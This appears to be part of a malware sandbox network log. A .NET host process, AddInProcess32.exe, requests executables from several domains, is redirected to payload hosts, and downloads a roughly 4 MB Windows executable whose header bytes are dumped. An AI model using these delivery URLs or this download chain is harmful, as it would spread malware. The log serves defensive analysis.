                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IkNXMFEzT2dyMTc5aXJrSlU5Q0dXdXc9PSIsInZhbHVlIjoiZ21pM0EyQklVWkozYUl5alhOVG1lL3RvNkdGR0U5WFhGV3FKTzMveHQ1a1BYR3JtdFJ6OFVNN2lQQ3Y4aVR5WGxsVHI5SVhpWW5RRktEU0Y5YmFHdHNROXd4b21FejcvUWNFa0grUTl5Zzl2b3pCekdSY0tkanc2RW9leXVEYWsiLCJtYWMiOiI4NDYyZDU1NzQ0NWJhMjI0ZWExNzAzNTI0NmNhMTAzODFkYTZiNmE1NmQ3YjFiOTY1YzAyMzExODA1N2U4NzNkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC397INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 41 41 6e 61 75 48 63 31 55 6d 50 68 30 70 62 41 31 69 34 65 58 55 25 32 42 4e 79 5a 56 45 36 39 56 4a 4d 51 50 6b 55 4e 45 6a 4d 6b 6f 63 52 53 30 48 56 34 5a 51 53 25 32 46 6e 4a 56 69 4e 51 7a 25 32 46 38 36 39 41 33 33 41 6b 6b 78 6b 43 44 46 76 37 4a 53 4a 50 36 4d 74 65 4b 77 31 56 61 45 42 39 34 76 4e 77 7a 67 25 32 42 25 32 42 4f 47 69 47 62 48 56 63 57 61 6e 66 4b 34 56 79 4a 46 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AAnauHc1UmPh0pbA1i4eXU%2BNyZVE69VJMQPkUNEjMkocRS0HV4ZQS%2FnJViNQz%2F869A33AkkxkCDFv7JSJP6MteKw1VaEB94vNwzg%2B%2BOGiGbHVcWanfK4VyJF"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            37192.168.2.555613104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC699INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eqemgt6cKf2aeXT0vm1omBv9XWX4YnUHZMZhCCtLK9vpGgxWrwB2XPc%2FAuzkrD3JQfYmHdtf2jFq4L5RSXRgyJ7xbHf9Ky0zSz4Z2ne28sTO5nnxugB5oPUrj8jCXSr%2FprGdWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820297e8d0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            38192.168.2.555614172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik9OYWNSbHA3Rll5b016anZ4YjAzYnc9PSIsInZhbHVlIjoiaGtCUnNIK05pZ0wvMlZHQWNRNGEwRG56aDFCMVlyY3FGTWVSTVNrMkx5K1Uvd2o3U1JvNmhzSkFtb25uL0pXZlVWRWdsNmZZbk9pNDEyOWVqYnM3Wk5qd3VPNXBsaktOQXp0Zi9XaXVETzhCNXV1RkpxTEd1Ymg1OXFDeTVMNngiLCJtYWMiOiJkYmI1ZDg0OWIxYjA5MWRiMzg1ZWRiYzhiYmQzNGY3OGQzNjAyMzg3NjQ3M2JlN2QzZTQyNWIzMjE3MjE2YWU3IiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6Im14MlBUZ1JhZUZBZHpmZVpSYkdBYWc9PSIsInZhbHVlIjoiNTF4b3B3Uml6UkdmOUlwZjdoZjBuMlF4dURBWDNCaGtJUiswMVpxbkIwaW5qZW0zZExoZURVY3dWcVV1V1Q1SWZXUDZXV2dDT2FMMmV2dnI1M3VmT1YvS0tJVWI1TFdGcDVRaDA2MU1MaldQU3pDdzN6UDZoVE1rUDZ5M0duMlQiLCJtYWMiOiI0ZmE4ZmI3N2UwZDMyYzg0M2JhYWQzZWE5YmJiY2IzNGQ1NDhmOGU5NDNlYjA5YmVlZDIxM2ZiNTc0NDM3NWRkIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC397INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 70 47 69 57 56 79 53 78 38 78 55 35 38 46 77 46 79 32 67 57 31 70 30 49 76 5a 45 37 44 54 46 33 25 32 46 49 5a 6d 5a 43 30 48 64 68 59 6a 50 68 38 4c 50 41 74 67 5a 53 61 51 4a 7a 65 78 76 25 32 46 51 42 42 30 7a 57 30 66 6a 7a 65 55 61 6a 59 25 32 42 4a 53 6c 74 4d 41 64 76 4f 5a 63 43 6f 4c 36 4d 38 6b 47 63 6c 61 6e 4d 64 52 31 25 32 42 31 70 64 39 52 25 32 42 53 74 30 70 79 37 30 39 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22
                                                                                                                                                                                                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pGiWVySx8xU58FwFy2gW1p0IvZE7DTF3%2FIZmZC0HdhYjPh8LPAtgZSaQJzexv%2FQBB0zW0fjzeUajY%2BJSltMAdvOZcCoL6M8kGclanMdR1%2B1pd9R%2BSt0py709"}],"group":"cf-nel","max_age":604800}NEL: {"
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 65 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 20 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 2d 73 6d 6f 6f 74 68 20 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 43 53 52 46 20 54 6f 6b 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                                                                                                                                                                            Data Ascii: e1b<!DOCTYPE html><html lang="en" class="h-100 scroll-behavior-smooth " dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> ... CSRF Token --> <meta name="csrf-token" content="
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 72 74 69 6e 79 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 47 6f 20 62 61 63 6b 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 66 6f 6f 74 65 72 20 69 64 3d 22 66 6f 6f 74 65 72 22 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 20 62 67 2d 62 61 73 65 2d 30 20 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                                                            Data Ascii: <a href="https://shortiny.com" class="btn btn-primary">Go back</a> </div> </div> </div> </div></div> <footer id="footer" class="footer bg-base-0 d-print-none"> <div class="container
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC880INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 69 78 65 64 2d 62 6f 74 74 6f 6d 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 2d 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 2d 30 20 6d 74 2d 30 20 6d 72 2d 33 20 6d 62 2d 33 20 6d 6c 2d 33 20 70 2d 32 20 72 6f 75 6e 64 65 64 20 63 6f 6f 6b 69 65 2d 62 61 6e 6e 65 72 20
                                                                                                                                                                                                                                                            Data Ascii: </div> </div> </div> <div class="fixed-bottom pointer-events-none"> <div class="d-flex justify-content-center align-items-center"> <div class="border-0 mt-0 mr-3 mb-3 ml-3 p-2 rounded cookie-banner
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            39192.168.2.555615172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC695INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BVDEdCrs7SQtlXMK%2FPBX5fYC8Zy6WgQI8yIQESdhElz%2FtvOZpRni9tSRGrqwXIM81xkhlzNRym%2Fxij%2F2ECgIShdZVwICWB%2Fkr%2FOpvaqvnjDcxdfcxF6kpne%2BWepOggk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820299e5c0adb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            40192.168.2.555609172.67.178.18344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC74OUTGET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC685INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FBHvSMkwysygsSwBQaoBeQ%2BFGDRsSyVmjNW3D2VWWtSUF92%2FIzTDfMkQoH19Fg9tE2oYBBfhDI2jgXiK2jKtpWJBrCOjSHyIZ5kJjhV3cJuR7Y5mdBF9SSMFSWu49N4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820299f740ad1-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            41192.168.2.555618104.21.63.7144344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC110OUTGET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC682INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l5mKmkT3oAdAxlKhxLepxzZKGtnttD%2FzDO7HQ4iNY%2FkGd7eAROpTDKNVx22cwM8AT31Z5uBlp7buvhmcx5QAd9ctQ0SF2nesF%2Bmcqd0QT8HDBeK5qYp%2BtCnQzUXppimqbaM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628202a6c4c09fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC687INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
